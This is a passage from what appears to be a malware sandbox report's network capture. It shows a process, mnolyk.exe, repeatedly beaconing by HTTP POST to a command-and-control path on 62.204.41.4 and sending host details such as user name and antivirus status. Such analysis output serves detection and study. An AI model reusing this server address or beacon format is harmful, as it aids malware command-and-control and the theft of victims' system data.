                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:17.546847105 CET363INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            175192.168.2.44987062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:17.723084927 CET364OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:17.788021088 CET364INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            176192.168.2.44987162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:17.959790945 CET365OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.023653030 CET365INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            177192.168.2.44987262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:18.196908951 CET366OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.262782097 CET366INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            178192.168.2.44987362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:18.447657108 CET367OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.512018919 CET367INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            179192.168.2.44987462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:18.694725037 CET368OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.757941008 CET368INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            18192.168.2.44971362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:28.821552038 CET207OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:28.884332895 CET207INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            180192.168.2.44987562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:18.930671930 CET369OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.994806051 CET369INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            181192.168.2.44987662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:19.187751055 CET370OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:19.253103018 CET370INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            182192.168.2.44987762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:19.428226948 CET371OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:19.490499973 CET371INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            183192.168.2.44987862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:19.667671919 CET372OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:19.732453108 CET372INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            184192.168.2.44987962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:19.911855936 CET373OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:19.976509094 CET373INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            185192.168.2.44988062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:20.163284063 CET374OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:20.230844021 CET374INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            186192.168.2.44988162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:20.412226915 CET375OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:20.477679968 CET375INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            187192.168.2.44988262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:20.650207996 CET376OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:20.713953972 CET376INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            188192.168.2.44988362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:20.884072065 CET377OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:20.950083017 CET377INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            189192.168.2.44988462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:21.133805990 CET378OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:21.201188087 CET378INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            19192.168.2.44971462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:29.062381983 CET208OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:29.129106998 CET208INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            190192.168.2.44988562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:21.385215044 CET379OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:21.446939945 CET379INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            191192.168.2.44988662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:21.612683058 CET380OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:21.674559116 CET380INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            192192.168.2.44988762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:21.867506981 CET381OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:21.931773901 CET381INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            193192.168.2.44988862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:22.112698078 CET382OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
